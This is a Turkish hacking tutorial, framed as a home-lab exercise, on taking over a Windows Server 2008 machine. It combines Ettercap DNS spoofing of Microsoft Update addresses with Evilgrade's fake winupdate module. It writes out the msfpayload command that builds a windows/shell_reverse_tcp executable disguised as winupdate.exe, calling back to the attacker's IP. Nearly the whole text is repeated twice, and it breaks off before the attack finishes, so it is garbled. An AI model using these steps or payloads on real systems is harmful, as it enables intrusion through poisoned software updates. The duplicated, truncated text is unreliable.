MITM Saldırısı ile Windows Server 2008 Hacking
Merhaba arkadaşlar. Bu makalemizde “MITM (Man in The Middle – Ortadaki Adam)” saldırısı yaparak Windows Server 2008 işletim sistemlerinin hacklenebilmesini konu alacağız. Yapacağımız işlem, “DNS Spoof” ve “MITM” saldırısını uygulamalı örnek ile pekiştirecektir.
Senaryo 1: Saldırgan, networkte bulunan bir Windows Server 2008 işletim sistemini hedef almaktadır. Bu Windows 2008 (kurban) işletim sistemi Microsoft Update (http://update.microsoft.com) web sitesinden bir update paketi indirmek istediğinde, bizim oluşturmuş olduğumuz zararlı kodları indirerek çalıştıracak. Bu zararlı kodlar sayesinde Windows Server 2008 işletim sisteminin yönetimini ele geçireceğiz.
Araç ve gereçler:
· Kali Linux (Ya da BackTrack 5 R2- R3)
· Windows Server 2008
· Evilgrade
· Ettercap
· Netcat (nc)
Kali Linux’u açarak networkte iletişim kuracak halde olmasını sağlayınız (Bu makale Kali Linux kullanıldığı varsayılarak hazırlanmıştır). Bu işlemi kendi laboratuvarımızı kullanarak yapacağımız için, Windows Server 2008 ile Kali Linux arasında NAT veya Bridget ağ kartının olması gerekmektedir. NAT ve Bridget ağ kartı eklemek için BackTrack 5 Kurulumu adresinde bulunan makaleyi takip edebilirsiniz.
Bu makale boyunca saldırganın ip adresi (Kali Linux) Resim-01’deki gibi 192.168.88.129 olacaktır.
Resim-02
Bu makale boyunca kurbanın ip adresi (Windows Server 2008) Resim-02’deki gibi 192.168.88.133 olacaktır.
Kali Linux’u açıp “terminal”i çalıştıralım. “evilgrade” yazarak enter ile devam edelim ve ya “Alt – F2” tuş kombinasyonu ile uygulama çalıştır ekranını açarak “evilgrade” yazarak “çalıştır”ı tıklayalım.
Resim-03
Evilgrade Resim-03 gibi açılacaktır. Evilgrade içerisinde “DNS kandırısı (DNS Spoof)” için kullanmak üzere 63 adet modül bulunmaktadır. Biz sahte Windows Update paketleri hazırlayacağımız için “winupdate” modülünü kullanacağız.
Resim-05
“Show options” komutu ile konfigüre edeceğimiz modülün özellikleri Resim-06’daki gibi görünecektir.
· VirtualHost: Bu kısım DNS spoof yapmamız gereken adresleri göstermektedir. DNS spoof işlemini yaptıktan sonra kullanıcı update.microsoft.com adresine girdiğinde bizim belirtmiş olduğumuz IP adresine yönlenecektir.
· Agent: Kurbana göndereceğimiz zararlı dosyamızın yolu olacak şekilde ayarlanmalıdır.
VirtualHost kısmını ayarlamak için yeni bir terminal ekranı açarak spoof edeceğimiz DNS adreslerini Kali Linux’un IP adresleri ile değiştirmemiz gerekmektedir.
Resim-06
“pico /usr/share/ettercap/etter.dns” komutu ile spoof edeceğimiz DNS adreslerini belirtmek için etter.dns dosyasını pico editörü ile açıyoruz.
Resim-07
Resim-05’te bulunan adresleri Resim-07’deki gibi pico editörü ile etter.dns dosyasına yazıyoruz. Örneğin windowsupdate.microsoft.com adresi için “A” kaydı girerek IP adresi olarak ta 192.168.88.129 yani Kali Linux’un IP adresini belirtmişiz. Kullanıcı spoof işleminden sonra windowsupdate.microsoft.com adresine girdiğinde 192.168.88.129 adresine yönlenecektir. DNS adreslerini girdikten sonra “CTRL + 0” ile değişikliği etter.dns dosyasına yazıyoruz ve “CTRL + X” ile pico editöründen çıkıyoruz.
Ardından evilgrade ekranına geri dönerek “agent”ımızı konfigüre etmemiz gerekiyor.
Resim-08
“set agent” komutu ile zararlı yazılımımızı oluşturup agent olarak atamamız gerekmektedir (Terminal ekranında bu komut tam görünmüyor. Terminal ekranında bir sorun var sanırım.) Bunun için set agent ‘[“/opt/****sploit/apps/pro/msf3/msfpayload windows/shell_reverse_tcp LHOST=192.168.88.129 LPORT=9999 X > <%OUT%>/tmp/winupdate.exe<%OUT%>”]’ komutunu giriyoruz. Bu komut ile ****sploit’in payloadlarından “windows/shell_reverse_tcp” payload’ını kullanacağımızı, bu payload’ın LHOST ip adresinin (geri dönüş ip adresi) 192.168.88.129 (Kali Linux’un IP Adresi) ve LPORT (geri dönüş portunun) 9999 olduğunu, X > komutu ile de bunu /tmp dizininde winupdate.exe adında oluşturmasını söylüyoruz. Böylece shell_reverse_tcp payloadı /tmp dizininde winupdate.exe adında bir exe dosyası haline gelece
ktir.
Resim-09
Bu işlemin hemen ardından “start” komutu ile evilgrade’i başlatıyoruz. Evilgrade başladığında “[DNSSERER] – DNS Server Ready. Waiting for Connections” yazacaktır. Bu durumda evilgrade başarılı bir şekilde başlamış ve kurbanın sunucuya bağlanması bekleniyor diye anlayabiliriz.
“ALT + F2” tuş kombinasyonu ile veya yeni bir terminal ekranı açıp, “ettercap –G” komutu ile ettercap’in grafiksek ara yüzüne erişiyoruz.
Merhaba arkadaşlar. Bu makalemizde “MITM (Man in The Middle – Ortadaki Adam)” saldırısı yaparak Windows Server 2008 işletim sistemlerinin hacklenebilmesini konu alacağız. Yapacağımız işlem, “DNS Spoof” ve “MITM” saldırısını uygulamalı örnek ile pekiştirecektir.
Senaryo 1: Saldırgan, networkte bulunan bir Windows Server 2008 işletim sistemini hedef almaktadır. Bu Windows 2008 (kurban) işletim sistemi Microsoft Update (http://update.microsoft.com) web sitesinden bir update paketi indirmek istediğinde, bizim oluşturmuş olduğumuz zararlı kodları indirerek çalıştıracak. Bu zararlı kodlar sayesinde Windows Server 2008 işletim sisteminin yönetimini ele geçireceğiz.
Araç ve gereçler:
· Kali Linux (Ya da BackTrack 5 R2- R3)
· Windows Server 2008
· Evilgrade
· Ettercap
· Netcat (nc)
Kali Linux’u açarak networkte iletişim kuracak halde olmasını sağlayınız (Bu makale Kali Linux kullanıldığı varsayılarak hazırlanmıştır). Bu işlemi kendi laboratuvarımızı kullanarak yapacağımız için, Windows Server 2008 ile Kali Linux arasında NAT veya Bridget ağ kartının olması gerekmektedir. NAT ve Bridget ağ kartı eklemek için BackTrack 5 Kurulumu adresinde bulunan makaleyi takip edebilirsiniz.
Bu makale boyunca saldırganın ip adresi (Kali Linux) Resim-01’deki gibi 192.168.88.129 olacaktır.
Resim-02
Bu makale boyunca kurbanın ip adresi (Windows Server 2008) Resim-02’deki gibi 192.168.88.133 olacaktır.
Kali Linux’u açıp “terminal”i çalıştıralım. “evilgrade” yazarak enter ile devam edelim ve ya “Alt – F2” tuş kombinasyonu ile uygulama çalıştır ekranını açarak “evilgrade” yazarak “çalıştır”ı tıklayalım.
Resim-03
Evilgrade Resim-03 gibi açılacaktır. Evilgrade içerisinde “DNS kandırısı (DNS Spoof)” için kullanmak üzere 63 adet modül bulunmaktadır. Biz sahte Windows Update paketleri hazırlayacağımız için “winupdate” modülünü kullanacağız.
Resim-05
“Show options” komutu ile konfigüre edeceğimiz modülün özellikleri Resim-06’daki gibi görünecektir.
· VirtualHost: Bu kısım DNS spoof yapmamız gereken adresleri göstermektedir. DNS spoof işlemini yaptıktan sonra kullanıcı update.microsoft.com adresine girdiğinde bizim belirtmiş olduğumuz IP adresine yönlenecektir.
· Agent: Kurbana göndereceğimiz zararlı dosyamızın yolu olacak şekilde ayarlanmalıdır.
VirtualHost kısmını ayarlamak için yeni bir terminal ekranı açarak spoof edeceğimiz DNS adreslerini Kali Linux’un IP adresleri ile değiştirmemiz gerekmektedir.
Resim-06
“pico /usr/share/ettercap/etter.dns” komutu ile spoof edeceğimiz DNS adreslerini belirtmek için etter.dns dosyasını pico editörü ile açıyoruz.
Resim-07
Resim-05’te bulunan adresleri Resim-07’deki gibi pico editörü ile etter.dns dosyasına yazıyoruz. Örneğin windowsupdate.microsoft.com adresi için “A” kaydı girerek IP adresi olarak ta 192.168.88.129 yani Kali Linux’un IP adresini belirtmişiz. Kullanıcı spoof işleminden sonra windowsupdate.microsoft.com adresine girdiğinde 192.168.88.129 adresine yönlenecektir. DNS adreslerini girdikten sonra “CTRL + 0” ile değişikliği etter.dns dosyasına yazıyoruz ve “CTRL + X” ile pico editöründen çıkıyoruz.
Ardından evilgrade ekranına geri dönerek “agent”ımızı konfigüre etmemiz gerekiyor.
Resim-08
“set agent” komutu ile zararlı yazılımımızı oluşturup agent olarak atamamız gerekmektedir (Terminal ekranında bu komut tam görünmüyor. Terminal ekranında bir sorun var sanırım.) Bunun için set agent ‘[“/opt/****sploit/apps/pro/msf3/msfpayload windows/shell_reverse_tcp LHOST=192.168.88.129 LPORT=9999 X > <%OUT%>/tmp/winupdate.exe<%OUT%>”]’ komutunu giriyoruz. Bu komut ile ****sploit’in payloadlarından “windows/shell_reverse_tcp” payload’ını kullanacağımızı, bu payload’ın LHOST ip adresinin (geri dönüş ip adresi) 192.168.88.129 (Kali Linux’un IP Adresi) ve LPORT (geri dönüş portunun) 9999 olduğunu, X > komutu ile de bunu /tmp dizininde winupdate.exe adında oluşturmasını söylüyoruz. Böylece shell_reverse_tcp payloadı /tmp dizininde winupdate.exe adında bir exe dosyası haline gelece
Resim-09
Bu işlemin hemen ardından “start” komutu ile evilgrade’i başlatıyoruz. Evilgrade başladığında “[DNSSERER] – DNS Server Ready. Waiting for Connections” yazacaktır. Bu durumda evilgrade başarılı bir şekilde başlamış ve kurbanın sunucuya bağlanması bekleniyor diye anlayabiliriz.
“ALT + F2” tuş kombinasyonu ile veya yeni bir terminal ekranı açıp, “ettercap –G” komutu ile ettercap’in grafiksek ara yüzüne erişiyoruz.